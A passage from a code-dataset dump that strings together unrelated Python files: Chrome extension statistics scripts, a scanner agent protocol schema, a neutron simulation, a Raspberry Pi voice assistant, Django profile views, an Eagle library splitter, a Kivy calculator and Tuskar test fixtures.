db_conn.execute(s_cnt).fetchone()[0]\n\n try:\n version_counts[n] += 1\n except KeyError:\n version_counts[n] = 1\n\n id_cnt += 1\n if not id_cnt % 1000:\n print('Counted versions of %d IDs' % id_cnt)\n\n db_conn.close()\n\n # Make a backup of the data\n with open('version_counts.json', 'w') as fout:\n json.dump(version_counts, fout)\n\n # Plot the data\n plot_data(version_counts)\n\n\ndef plot_from_count_backup():\n with open('version_counts.json') as fin:\n counts = json.load(fin)\n plot_data(counts)\n\n\ndef plot_data(counts):\n \"\"\"\n Create a plot of the data in the counts dict.\n\n :param counts: Dictionary of {version_count: ID_count}.\n :type counts: dict\n :return: None\n :rtype: None\n \"\"\"\n # Create the plot of the data\n d = {'x': [], 'y': []}\n for x in counts:\n d['x'].append(x)\n d['y'].append(counts[x])\n data = [Bar(x=d['x'], y=d['y'])]\n\n plotoff.plot(data, show_link=False, filename='count_ext_versions_graph.html', auto_open=False)\n\n\ndef get_top_exts(web_store_scrape_file, with_num_ratings=False):\n \"\"\"\n Scrape the file, return the extension IDs.\n\n :param web_store_scrape_file: Should be a path to a HTML file taken from\n the Chrome Web Store showing the \"Popular\" category. There's no\n guarantee that the CSS and tag attributes used to locate the desired\n information will work in the future. Check the Web Store's source to be\n sure.\n :type web_store_scrape_file: str\n :param with_num_ratings: Flag indicates if the number of reviews should\n also be returned. 
If True, the return type will be a dictionary.\n :type with_num_ratings: bool\n :return: The list of extension IDs.\n :rtype: tuple|dict\n \"\"\"\n soup = Bsoup(web_store_scrape_file, \"lxml\")\n ext_num_ratings = {}\n\n for tile in soup.find_all('div', class_='webstore-test-wall-tile'):\n link = tile.a.get('href')\n ext_id = id_from_url(link)\n\n rating = tile.find('div', attrs={'g:type': \"AverageStarRating\"})\n num_ratings = int(rating.span.string[1:-1]) # Number with parentheses around them\n\n ext_num_ratings[ext_id] = num_ratings\n\n if with_num_ratings:\n return ext_num_ratings\n return tuple(ext_num_ratings.keys())\n\n\ndef id_from_url(url):\n \"\"\"\n Extract the extension ID from a Web Store URL.\n\n :param url: URL to the extension on the Chrome Web Store.\n :type url: str\n :return: The 32-character ID, or None.\n :rtype: str|None\n \"\"\"\n pat = r'https://chrome.google.com/webstore/detail.*/([a-z]{32})/?'\n m = match(pat, url)\n if m:\n return m.group(1)\n\n\ndef get_num_files():\n # Get a handle on the DB and table\n db_conn = DB_META.bind.connect()\n extension = Table('extension', DB_META)\n\n # Iterate through the DB, get the ID and version number\n s = select([extension.c.pk, extension.c.ext_id, extension.c.version]).where(extension.c.ttl_files.is_(None))\n cnt = 0\n not_found = 0\n for row in db_conn.execute(s):\n # CWD to the location of the unpacked CRX\n the_dir = '/var/lib/dbling/unpacked/{}/{}'.format(row[extension.c.ext_id], row[extension.c.version])\n\n # Execute `find | wc -l` to get the number of files\n try:\n ttl_files = int(check_output('/usr/bin/find | /usr/bin/wc -l', shell=True, cwd=the_dir).strip())\n except FileNotFoundError:\n # Doesn't hurt anything that we don't have the files for this extension, but we should count it\n not_found += 1\n continue\n\n # Update the DB with the number of files\n with db_conn.begin():\n db_conn.execute(update(extension).where(extension.c.pk == row[extension.c.pk]).values(ttl_files=ttl_files))\n\n cnt += 1\n if cnt and not cnt % 1000:\n print('Counted files for %d extensions' % cnt)\n\n print('Counted files for %d extensions' % cnt)\n if not_found:\n print(\"%d database entries don't have corresponding files saved.\" % not_found)\n db_conn.close()\n\n\ndef family_histogram():\n db_conn = DB_META.bind.connect()\n cent_fam = Table('centroid_family', DB_META)\n\n # Get the number of members in each centroid family, in descending order\n d = {'x': [], 'y': []}\n s = select([cent_fam.c.distinct_id_members]).order_by(desc(cent_fam.c.distinct_id_members))\n x = 0\n\n for row in db_conn.execute(s):\n x += 1\n d['x'].append(x)\n d['y'].append(row[cent_fam.c.distinct_id_members])\n if x >= 200:\n break\n db_conn.close()\n\n data = [Bar(x=d['x'], y=d['y'])]\n layout = Layout(xaxis=dict(autorange=True), yaxis=dict(type='log', autorange=True))\n fig = Figure(data=data, layout=layout)\n\n plotoff.plot(fig, show_link=False, filename='centroid_family_hist.html')#, auto_open=False, layout=layout)\n\n\ndef tao_histo():\n db_conn = DB_META.bind.connect()\n extension = Table('extension', DB_META)\n\n d = {'x': [], 'y': []}\n\n # Get the set of distinct ttl_files values\n s = select([extension.c.ttl_files], distinct=True)\n\n for dist in db_conn.execute(s):\n x = dist[extension.c.ttl_files]\n t_cnt = select([extension.c.pk]).where(extension.c.ttl_files == x).alias('tao').count()\n y = db_conn.execute(t_cnt).fetchone()[0]\n d['x'].append(x)\n d['y'].append(y)\n\n data = [Bar(x=d['x'], y=d['y'])]\n plotoff.plot(data, show_link=False, 
filename='tao_histo.html', auto_open=True)\n","sub_path":"other/crx_stats.py","file_name":"crx_stats.py","file_ext":"py","file_size_in_byte":11422,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"438874698","text":"# This file is part of sner4 project governed by MIT license, see the LICENSE.txt file.\n\"\"\"\nagent to server protocol definition\n\n\n## Agent-Server protocol is defined by following ABNF\n\n### Definitions\n\nqueue-id = 1*CHAR\n\nnowork = jsonobject\n    ; {}\n\nassignment = jsonobject\n    ; {\n    ;   \"id\": uuid,\n    ;   \"config\": jsonobject, module config\n    ;   \"targets\": array of strings\n    ; }\n\noutput = jsonobject\n    ; {\n    ;   \"id\": uuid,\n    ;   \"retval\": int,\n    ;   \"output\": string, base64 encoded data\n    ; }\n\napikey = 1*HEXDIG\nauth-header = \"Authorization:\" SP \"Apikey\" SP apikey\n\nhttp-ok = \"HTTP/1.1 200 OK\" CRLF CRLF\n    ; standard http response\nhttp-bad-request = \"HTTP/1.1 400 Bad Request\" CRLF CRLF\n    ; standard http response\n\n\n### Request assignment/job\n\nrequest-assign-job = \"GET /api/v1/scheduler/job/assign\" [\"/\" queue-id] SP \"HTTP/1.1\" CRLF auth-header CRLF CRLF\nresponse-assign-job\t= response-nowork / response-assignment\nresponse-nowork\t\t= http-ok nowork\nresponse-assignment\t= http-ok assignment\n\n\n### Upload assignment/job output\n\nrequest-job-output\t= \"POST /api/v1/scheduler/job/output HTTP/1.1\" CRLF auth-header CRLF CRLF output\nresponse-job-output\t= response-accepted / response-refused\nresponse-accepted\t= http-ok\n    ; output accepted\nresponse-refused\t= http-bad-request\n    ; malformed request or output refused\n\"\"\"\n# pylint: disable=invalid-name\n\ncommon_definitions = {\n    \"UUID\": {\n        \"type\": \"string\",\n        \"pattern\": r\"^[a-f0-9\\-]{36}$\"\n    }\n}\n\nassignment = {\n    \"$schema\": \"http://json-schema.org/draft-07/schema#\",\n    \"definitions\": common_definitions,\n\n    \"type\": \"object\",\n    \"required\": [\"id\", \"config\", \"targets\"],\n    \"additionalProperties\": False,\n    \"properties\": {\n        \"id\": {\n            \"$ref\": \"#/definitions/UUID\"\n        },\n        \"config\": {\n            \"type\": \"object\",\n            \"required\": [\"module\"],\n            \"additionalProperties\": True,\n            \"properties\": {\n                \"module\": {\"type\": \"string\"}\n            }\n        },\n        \"targets\": {\n            \"type\": \"array\",\n            \"items\": {\"type\": \"string\"}\n        }\n    }\n}\n\noutput = {\n    \"$schema\": \"http://json-schema.org/draft-07/schema#\",\n    \"definitions\": common_definitions,\n\n    \"type\": \"object\",\n    \"required\": [\"id\", \"retval\", \"output\"],\n    \"additionalProperties\": False,\n    \"properties\": {\n        \"id\": {\n            \"$ref\": \"#/definitions/UUID\"\n        },\n        \"retval\": {\n            \"type\": \"integer\"\n        },\n        \"output\": {\n            \"type\": \"string\"\n        }\n    }\n}\n","sub_path":"sner/agent/protocol.py","file_name":"protocol.py","file_ext":"py","file_size_in_byte":3032,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"585194781","text":"import matplotlib.pyplot as plt\nimport numpy as np\n\n\n\t# Plot options and figure saving\ndef createPlot(axis = False, xScaling = False, yScaling = False, xLabel = False, yLabel = False,\n\t\t\t   originLines = False, grid = False, invert = False, legend = False, title = False, file = False):\n\tif axis: plt.axis(axis)\n\tif xScaling: plt.xscale(xScaling)\n\tif yScaling: plt.yscale(yScaling)\n\tif xLabel: plt.xlabel(xLabel)\n\tif yLabel: plt.ylabel(yLabel)\n\tif originLines:\n\t\tplt.axhline(y = 0, color = \"k\")\n\t\tplt.axvline(x = 0, color = \"k\")\n\tif 
grid:\n\t\tplt.minorticks_on()\n\t\tplt.grid(True, \"minor\", color = \"grey\", linestyle = \"--\", linewidth = 0.25)\n\t\tplt.grid(True, \"major\", color = \"black\", linestyle = \"--\", linewidth = 0.5)\n\tif invert:\n\t\tif ((invert == \"xAxis\") or (invert == \"both\")):\n\t\t\tplt.gca().invert_xaxis()\n\t\tif ((invert == \"yAxis\") or (invert == \"both\")):\n\t\t\tplt.gca().invert_yaxis()\n\tif legend: plt.legend()\n\tif title: plt.title(title)\n\tif file: plt.savefig(file)\n\ndef neutronInteraction(absorptionProb, scatterProb, lam, plateDepth, neutronAmount):\n\tsumReflected, sumAbsorbed, sumTransmitted = 0, 0, 0\n\n\tfor i in range(0, neutronAmount):\n\t\ttheta, x = 0.0, 0.0\n\n\t\twhile True:\n\t\t\tr = np.random.random()\n\t\t\tl = -lam*np.log(r)\n\t\t\tx += l*np.cos(theta)\n\n\t\t\t\t# If (x < 0), the neutron is reflected\n\t\t\tif (x < 0):\n\t\t\t\tsumReflected += 1\n\t\t\t\tbreak\n\t\t\t\t# If (x > d), the neutron has passed through the plate\n\t\t\telif (x > plateDepth):\n\t\t\t\tsumTransmitted += 1\n\t\t\t\tbreak\n\t\t\telse:\n\t\t\t\tr = np.random.random()\n\t\t\t\t\t# If (r < pA), the neutron is absorbed\n\t\t\t\tif (r < absorptionProb):\n\t\t\t\t\tsumAbsorbed += 1\n\t\t\t\t\tbreak\n\t\t\t\t\t# If (pA <= r < (pA + pS)), the neutron is scattered inside the plate but not absorbed\n\t\t\t\telif (r < (absorptionProb + scatterProb)):\n\t\t\t\t\ttheta = np.arccos(1 - 2*r)\n\t\t\t\t\tcontinue\n\t\t\t\t\t# If (r >= (pA + pS)), the neutron is still inside the plate, neither absorbed nor scattered\n\t\t\t\telse:\n\t\t\t\t\tcontinue\n\n\t\t# Rates of reflected/absorbed/transmitted neutrons\n\treflectionRate = sumReflected/neutronAmount\n\tabsorptionRate = sumAbsorbed/neutronAmount\n\ttransmissionRate = sumTransmitted/neutronAmount\n\n\t\t# Uncertainties on the reflected/absorbed/transmitted neutron rates\n\tsigmaReflectionRate = rateUncertainty(reflectionRate, neutronAmount)\n\tsigmaAbsorptionRate = rateUncertainty(absorptionRate, neutronAmount)\n\tsigmaTransmissionRate = rateUncertainty(transmissionRate, neutronAmount)\n\n\t\t# Uncertainties on the counts of reflected/absorbed/transmitted neutrons\n\tsigmaReflectionSum = sumUncertainty(sumReflected, neutronAmount)\n\tsigmaAbsorptionSum = sumUncertainty(sumAbsorbed, neutronAmount)\n\tsigmaTransmissionSum = sumUncertainty(sumTransmitted, neutronAmount)\n\n\trates = [reflectionRate, absorptionRate, transmissionRate]\n\trateSigmas = [sigmaReflectionRate, sigmaAbsorptionRate, sigmaTransmissionRate]\n\tsumSigmas = [sigmaReflectionSum, sigmaAbsorptionSum, sigmaTransmissionSum]\n\n\treturn rates, rateSigmas, sumSigmas\n\n\t# Uncertainty formulas\nrateUncertainty = lambda X, N : np.sqrt(X*(1 - X)/(N - 1))\nsumUncertainty = lambda X, N : np.sqrt(X*(N - X)/(N - 1))\n\n\t# Initialize the parameters\npA = 0.3\npS = 0.3\nlam = 0.2\nd = 1\nneutronAmount = 1000\nsimulationRounds = 500\n\n\t# Initialize the arrays\nR, A, T = np.zeros(simulationRounds), np.zeros(simulationRounds), np.zeros(simulationRounds)\nsR, sA, sT = np.zeros(simulationRounds), np.zeros(simulationRounds), np.zeros(simulationRounds)\nsigR, sigA, sigT = np.zeros(simulationRounds), np.zeros(simulationRounds), np.zeros(simulationRounds)\nsigSR, sigSA, sigST = np.zeros(simulationRounds), np.zeros(simulationRounds), np.zeros(simulationRounds)\n\n\t# Simulation loop\nfor i in range(0, simulationRounds):\n\trates, rateSigmas, sumSigmas = neutronInteraction(pA, pS, lam, d, neutronAmount)\n\n\tR[i] = rates[0]\n\tA[i] = rates[1]\n\tT[i] = rates[2]\n\n\tsR[i] = 
rates[0]*neutronAmount\n\tsA[i] = rates[1]*neutronAmount\n\tsT[i] = rates[2]*neutronAmount\n\n\tsigR[i] = rateSigmas[0]\n\tsigA[i] = rateSigmas[1]\n\tsigT[i] = rateSigmas[2]\n\n\tsigSR[i] = sumSigmas[0]\n\tsigSA[i] = sumSigmas[1]\n\tsigST[i] = sumSigmas[2]\n\n\t# Maximum uncertainties\nsigR, sigA, sigT = np.max(sigR), np.max(sigA), np.max(sigT)\nsigSR, sigSA, sigST = np.max(sigSR), np.max(sigSA), np.max(sigST)\n\nvarianceR = np.average(np.abs(np.diff(R)))\nvarianceA = np.average(np.abs(np.diff(A)))\nvarianceT = np.average(np.abs(np.diff(T)))\n\nprint(f\"Average variation of R ({varianceR:.6f}), compared to sigR ({sigR:.6f})\")\nprint(f\"Average variation of A ({varianceA:.6f}), compared to sigA ({sigA:.6f})\")\nprint(f\"Average variation of T ({varianceT:.6f}), compared to sigT ({sigT:.6f})\")\n\nvarianceSR = np.average(np.abs(np.diff(sR)))\nvarianceSA = np.average(np.abs(np.diff(sA)))\nvarianceST = np.average(np.abs(np.diff(sT)))\n\nprint(f\"Average variation of sR ({varianceSR:.6f}), compared to sigSR ({sigSR:.6f})\")\nprint(f\"Average variation of sA ({varianceSA:.6f}), compared to sigSA ({sigSA:.6f})\")\nprint(f\"Average variation of sT ({varianceST:.6f}), compared to sigST ({sigST:.6f})\")\n\n\t# Figure dimensions (width, height)\nfigsize = (12, 8)\n\nfig, axes = plt.subplots(1, 3, figsize = figsize, sharey = True)\nfig.suptitle(\"Histogram of the interaction between a neutron beam and a plate\")\naxes[0].hist(sR, color = \"r\", edgecolor = \"k\", linewidth = 1)\naxes[0].set_title(\"Histogram of reflected neutrons\")\naxes[0].set(xlabel = \"sR\")\naxes[1].hist(sA, color = \"g\", edgecolor = \"k\", linewidth = 1)\naxes[1].set_title(\"Histogram of absorbed neutrons\")\naxes[1].set(xlabel = \"sA\")\naxes[2].hist(sT, color = \"b\", edgecolor = \"k\", linewidth = 1)\naxes[2].set_title(\"Histogram of transmitted neutrons\")\naxes[2].set(xlabel = \"sT\")\n\nfor axe in axes:\n\taxe.set(ylabel = \"Frequency\")\n\taxe.label_outer()\n\ncreatePlot(file = \"histogramme3.png\")\nplt.show()\n","sub_path":"source/tp/6/question3.py","file_name":"question3.py","file_ext":"py","file_size_in_byte":5751,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"504071983","text":"#!/usr/bin/python3\r\n\r\n# chmod o+x hora.py // give the file execute permission\r\n# crontab -e // edit the crontab so the script can start by itself when the system boots\r\n# @reboot python3 /home/pi/asistente/main.py // add this line to the crontab, save and reboot; it should then work\r\n\r\n# sudo rasp-config // the audio output must be changed, since HDMI is used by default; set it to plug, the analogue output\r\n\r\n\r\n# https://es.stackoverflow.com/questions/150343/c%C3%B3mo-se-hace-en-linux-para-ejecutar-un-archivo-python-al-arrancar-la-m%C3%A1quina\r\n# https://pypi.org/project/SpeechRecognition/3.0.0/\r\n# https://www.raspberrypi-spy.co.uk/2019/06/using-a-usb-audio-device-with-the-raspberry-pi/\t // change the audio output\r\n\r\n# sudo apt install portaudio19-dev\r\n# sudo apt install mpg321\r\n# sudo apt install flac\r\n# sudo apt install python3-pip\r\n# sudo pip3 install SpeechRecognition\r\n# sudo pip3 install pyaudio\r\n# sudo pip3 install gTTS\r\n\r\n# New, not used yet, but they will be for text_parser\r\n# pip3 install nltk\r\n# pip3 install numpy\r\n\r\nimport threading\r\nimport time\r\nimport random\r\n\r\nfrom datetime import datetime\r\nfrom datetime import date\r\n\r\nfrom servidor import Servidor\r\nfrom 
voice_input import Voice_input\r\nfrom voice_output import Voice_output\r\n#from text_parser import Text_parser\r\nfrom procesa_comando import Procesa_comando\r\nimport raspberry as rpi\r\n\r\n\r\ndef ServidorComandos():\r\n\ts = Servidor(3333) # port number\r\n\tglobal idioma, w\r\n\twhile(True):\r\n\t\ttry:\r\n\t\t\tmsg = s.recibir()\r\n\t\t\tval, idioma = w.ProcesaComando(msg,idioma)\r\n\t\texcept:\r\n\t\t\tpass\r\n\r\ndef GpioAutomatico(): # Keeps the fan running when needed, and adds automatic power-on scheduling.\r\n\tglobal hora_encendido, hora_apagado\r\n\tstatus_actual = 0\r\n\twhile True:\r\n\t\tif round(rpi.get_cpu_temp()) >= 42:\r\n\t\t\trpi.onPin(12)\r\n\t\telse:\r\n\t\t\trpi.offPin(12)\r\n\r\n\t\thora_act = datetime.now().time()\r\n\t\tif (hora_act > hora_encendido) and (hora_act < hora_apagado):\r\n\t\t\tif status_actual == 0:\r\n\t\t\t\tstatus_actual = 1\r\n\t\t\t\trpi.onRele(11)\r\n\t\telif (status_actual == 1):\r\n\t\t\tstatus_actual = 0\r\n\t\t\trpi.offRele(11)\r\n\r\n\t\ttime.sleep(15)\r\n\r\nhiloServidor = threading.Thread(target=ServidorComandos)\r\nhiloServidor.start()\r\n\r\n# Raspberry Pi setup\r\npines = [7,11,12] # the fan is GPIO 12, 11 is the red light\r\nrpi.iniciar(False,\"BOARD\",pines)\r\nfor i in pines:\r\n\trpi.offRele(i)# turn all pins off\r\n\r\nhora_encendido = datetime.strptime(\"20:00:00\",\"%X\").time()\r\nhora_apagado = datetime.strptime(\"22:30:00\",\"%X\").time()\r\n\r\nhiloGpio = threading.Thread(target=GpioAutomatico)\r\nhiloGpio.start()\r\n\r\ns = Voice_output()\r\nv = Voice_input(\"USB\") # microphone name; pass 1 to list the available mics\r\nw = Procesa_comando(1) # the 1 makes it print the received command to the console\r\nidioma = \"es\"\r\n\r\nwhile(True):\r\n\ttexto = v.ObtenerRespuestaVoz(idioma)\r\n\tval, idioma = w.ProcesaComando(texto,idioma) # val is the return value: -1 the command does not exist, 1 it ran and already gave a voice reply, 2 it ran without a voice reply, so we provide one:\r\n\tif val == -1:\r\n\t\tif idioma == \"en\":\r\n\t\t\ts.RespuestadeVoz(\"Sorry but I couldn't run the command\",idioma)\r\n\t\telse:\r\n\t\t\ts.RespuestadeVoz(\"Perdon pero no pude ejecutar el comando\",idioma)\r\n\telif val == 2:\r\n\t\tsalidas = [\"listo\",\"hecho\",\"de acuerdo\",\"sin problema\",\"claro\",\"okey\",\"esta bien\"]\r\n\t\ts.RespuestadeVoz(random.choice(salidas),idioma)\r\n\ttime.sleep(1)\r\n\r\n# unused\r\n# v = Voice_input(\"sysdefault\",1)\r\n# #analizar = Text_parser()\r\n# salida.RespuestadeVoz(\"es\",\"Hola, soy tu asistente de voz, ¿cual es tu nombre?\")\r\n# texto = v.ObtenerRespuestaVoz(\"es\")\r\n# nombre = analizar.obtenerNombre(texto)\r\n# salida.RespuestadeVoz(\"es\",\"Hola David, ¿como quieres llamarme?\")\r\n# texto = v.ObtenerRespuestaVoz(\"es\") \r\n# salida.RespuestadeVoz(\"es\",\"Muy bien, mi nombre sera Alina, vamos a realizar las primeras configuraciones\")\r\n# v = Procesa_comando()\r\n# v.ProcesaComando(\"idioma\")","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4016,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"337259332","text":"from django.contrib.auth.models import User\nfrom django.shortcuts import render, redirect\nfrom django.contrib import messages\nfrom django.contrib.auth.decorators import login_required\nfrom .forms import UserRegisterForm, ProfileUpdateForm\nfrom .models import Profile\n\n# Create your views here.\n\n\ndef register(request):\n    if 
request.method == 'POST':\n        form = UserRegisterForm(request.POST)\n        if form.is_valid():\n            form.save()\n            username = form.cleaned_data.get('username')\n            messages.success(request, f'Merci {username}, votre compte a été créé avec succès, vous pouvez maintenant vous connecter')\n            return redirect('login')\n    else:\n        form = UserRegisterForm()\n    return render(request, 'account/register.html', {'form': form})\n\n\n@login_required\ndef profile(request):\n    user_pk = request.user.pk\n    user_profile = Profile.objects.get(user_id=user_pk)\n    products = user_profile.favorite.all()\n\n    if request.method == 'POST':\n        p_form = ProfileUpdateForm(request.POST, request.FILES, instance=request.user.profile)\n\n        if p_form.is_valid():\n            try:\n                p_form.save()\n                messages.success(request, 'Votre photo a été mise à jour !')\n                return redirect('profile')\n            except ValueError:\n                messages.error(request, 'Veuillez mettre en ligne une image')\n                return redirect('profile')\n\n    else:\n        p_form = ProfileUpdateForm()\n\n    context = {\n        \"products\": products,\n        \"p_form\": p_form\n    }\n    return render(request, 'account/profile.html', context)\n","sub_path":"purbeurre/account/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1631,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"148413653","text":"#!/usr/bin/env python\n\nimport os\nimport sys\nimport shutil\nimport xml.dom.minidom\nimport re\n\n\ndef find_only_subnode(element, subnode_name):\n    ret = element.getElementsByTagName(subnode_name)\n    assert len(ret) == 1, \"Found more or less than 1 %s node\" % subnode_name\n    return ret[0]\n\n\ndef filter_filenames(in_name, outdir, extension):\n    new_name = re.sub(\"[^0-9A-Za-z_\\-]\", \"-\", in_name)\n    filename = \"%s/%s.%s\" % (outdir, new_name, extension)\n    if not os.path.exists(filename):\n        return filename\n\n    extra_num = 0\n    filename = \"%s/%s.%s\" % (outdir, new_name + str(extra_num), extension)\n    while os.path.exists(filename):\n        extra_num = extra_num + 1\n        filename = \"%s/%s.%s\" % (outdir, new_name + str(extra_num), extension)\n    return filename\n\n\ndef write_out_subnode(node, outdir, extension):\n    name = node.getAttribute(\"name\")\n    filename = filter_filenames(name, outdir, extension)\n    assert not os.path.exists(filename), (\n        \"The output file %s already exists!\" % filename)\n    f = open(filename, \"w\")\n    f.write(node.toxml(\"utf-8\"))\n    f.close()\n\n\ndef main():\n    if len(sys.argv) != 3:\n        print(\"Usage: %s file.lbr outdir\" % (sys.argv[0]))\n        sys.exit(1)\n\n    lbrfile = sys.argv[1]\n    outdir = sys.argv[2]\n\n    # parse lbr\n    lbr = xml.dom.minidom.parse(lbrfile)\n    libraryNode = find_only_subnode(lbr, \"library\")\n\n    # find the main stuff\n    packagesNode = find_only_subnode(libraryNode, \"packages\")\n    symbolsNode = find_only_subnode(libraryNode, \"symbols\")\n    devicesetsNode = find_only_subnode(libraryNode, \"devicesets\")\n\n    # FIXME: may be dangerous\n    shutil.rmtree(outdir, ignore_errors=True)\n    os.mkdir(outdir)\n\n    # remove all the packages, symbols, devicesets\n    packagesNode.parentNode.removeChild(packagesNode)\n    symbolsNode.parentNode.removeChild(symbolsNode)\n    devicesetsNode.parentNode.removeChild(devicesetsNode)\n\n    # write out the remainder (the \"metadata\")\n    f = open(\"%s/meta.xml\" % outdir, \"w\")\n    lbr.writexml(f)\n    f.close()\n\n    # write out all the \"main stuff\"\n    for n in packagesNode.childNodes:\n        if n.nodeType == xml.dom.Node.TEXT_NODE:\n            assert n.data.strip() == \"\", (\n                \"Text node with some data not understood (%s)\" % n.data)\n        else:\n            assert 
n.nodeType == xml.dom.Node.ELEMENT_NODE, (\n                \"Unknown node type (%s)\" % n.nodeType)\n            write_out_subnode(n, outdir, \"pac\")\n\n    for n in symbolsNode.childNodes:\n        if n.nodeType == xml.dom.Node.TEXT_NODE:\n            assert n.data.strip() == \"\", (\n                \"Text node with some data not understood (%s)\" % n.data)\n        else:\n            assert n.nodeType == xml.dom.Node.ELEMENT_NODE, (\n                \"Unknown node type (%s)\" % n.nodeType)\n            write_out_subnode(n, outdir, \"sym\")\n\n    for n in devicesetsNode.childNodes:\n        if n.nodeType == xml.dom.Node.TEXT_NODE:\n            assert n.data.strip() == \"\", (\n                \"Text node with some data not understood (%s)\" % n.data)\n        else:\n            assert n.nodeType == xml.dom.Node.ELEMENT_NODE, (\n                \"Unknown node type (%s)\" % n.nodeType)\n            write_out_subnode(n, outdir, \"dev\")\n\nif __name__ == '__main__':\n    main()\n","sub_path":"tools/split_lbr.py","file_name":"split_lbr.py","file_ext":"py","file_size_in_byte":3256,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"415799695","text":"from math import e\r\nfrom kivy.app import App\r\nfrom kivy.uix.gridlayout import GridLayout\r\n\r\nclass MainGridLayout(GridLayout):\r\n    def calc(self,event):\r\n        if event:\r\n            try:\r\n                self.display.text = str(eval(event))\r\n            except:\r\n                # assign to the text property rather than calling it\r\n                self.display.text = \"error\"\r\n        else:\r\n            self.display.text = \"error\"\r\n\r\nclass TestApp(App):\r\n    def build(self):\r\n        return MainGridLayout()\r\n\r\nkv = TestApp()\r\nkv.run()\r\n","sub_path":"part03/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":471,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"284110778","text":"# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 
See the\n# License for the specific language governing permissions and limitations\n# under the License.\n\nfrom tuskar_ui import api\n\nfrom openstack_dashboard.test.test_data import utils as test_data_utils\n\nfrom novaclient.v1_1.contrib import baremetal\nfrom tuskarclient.v1 import flavors\nfrom tuskarclient.v1 import racks\nfrom tuskarclient.v1 import resource_classes\n\n\ndef data(TEST):\n # Flavors\n TEST.tuskarclient_flavors = test_data_utils.TestDataContainer()\n TEST.tuskar_flavors = test_data_utils.TestDataContainer()\n flavor_1 = flavors.Flavor(flavors.FlavorManager(None),\n {'id': '1',\n 'name': 'nano',\n 'max_vms': 100,\n 'capacities':\n [{\"name\": \"cpu\",\n \"value\": 64,\n \"unit\": \"CPU\"},\n {\"name\": \"memory\",\n \"value\": 1024,\n \"unit\": \"MB\"},\n {\"name\": \"storage\",\n \"value\": 1,\n \"unit\": \"GB\"},\n {\"name\": \"ephemeral_disk\",\n \"value\": 0,\n \"unit\": \"GB\"},\n {\"name\": \"swap_disk\",\n \"value\": 2,\n \"unit\": \"GB\"}]})\n flavor_2 = flavors.Flavor(flavors.FlavorManager(None),\n {'id': '2',\n 'name': 'large',\n 'max_vms': 10,\n 'capacities': []})\n TEST.tuskarclient_flavors.add(flavor_1, flavor_2)\n TEST.tuskar_flavors.add(api.Flavor(flavor_1), api.Flavor(flavor_2))\n\n # Resource Classes\n TEST.tuskarclient_resource_classes = test_data_utils.TestDataContainer()\n TEST.tuskar_resource_classes = test_data_utils.TestDataContainer()\n resource_class_1 = resource_classes.ResourceClass(\n resource_classes.ResourceClassManager(None),\n {'id': '1',\n 'service_type': 'compute',\n 'racks': [{'id': 1}, {'id': 2}],\n 'name': 'rclass1'})\n resource_class_2 = resource_classes.ResourceClass(\n resource_classes.ResourceClassManager(None),\n {'id': '2',\n 'service_type': 'compute',\n 'racks': [],\n 'name': 'rclass2'})\n TEST.tuskarclient_resource_classes.add(resource_class_1, resource_class_2)\n TEST.tuskar_resource_classes.add(api.ResourceClass(resource_class_1),\n api.ResourceClass(resource_class_2))\n\n #Racks\n TEST.tuskarclient_racks = test_data_utils.TestDataContainer()\n TEST.tuskar_racks = test_data_utils.TestDataContainer()\n rack_1 = racks.Rack(racks.RackManager(None),\n {'id': '1',\n 'name': 'rack1',\n 'location': 'location',\n 'subnet': '192.168.1.0/24',\n 'state': 'active',\n 'nodes':\n [{'id': '1'},\n {'id': '2'},\n {'id': '3'},\n {'id': '4'}],\n 'capacities':\n [{\"name\": \"total_cpu\",\n \"value\": \"64\",\n \"unit\": \"CPU\"},\n {\"name\": \"total_memory\",\n \"value\": \"1024\",\n \"unit\": \"MB\"}],\n 'resource_class': {'id': '1'}})\n rack_2 = racks.Rack(racks.RackManager(None),\n {'id': '2',\n 'name': 'rack2',\n 'location': 'location',\n 'subnet': '192.168.1.0/25',\n 'state': 'provisioning',\n 'nodes': [],\n 'capacities':\n [{\"name\": \"total_cpu\",\n \"value\": \"1\",\n \"unit\": \"CPU\"},\n {\"name\": \"total_memory\",\n \"value\": \"4\",\n \"unit\": \"MB\"}],\n 'resource_class': {'id': '1'}})\n rack_3 = racks.Rack(racks.RackManager(None),\n {'id': '3',\n 'name': 'rack3',\n 'location': 'location',\n 'subnet': '192.168.1.0/26',\n 'state': 'inactive',\n 'nodes': [],\n 'capacities':\n [{\"name\": \"total_cpu\",\n \"value\": \"1\",\n \"unit\": \"CPU\"},\n {\"name\": \"total_memory\",\n \"value\": \"2\",\n \"unit\": \"MB\"}],\n 'resource_class': None})\n TEST.tuskarclient_racks.add(rack_1, rack_2, rack_3)\n TEST.tuskar_racks.add(api.Rack(rack_1), api.Rack(rack_2), api.Rack(rack_3))\n\n # Nodes\n TEST.baremetalclient_nodes = test_data_utils.TestDataContainer()\n TEST.baremetal_nodes = test_data_utils.TestDataContainer()\n 
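# node_5 below is never assigned to a rack, to exercise the \"unracked\" containers\n    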
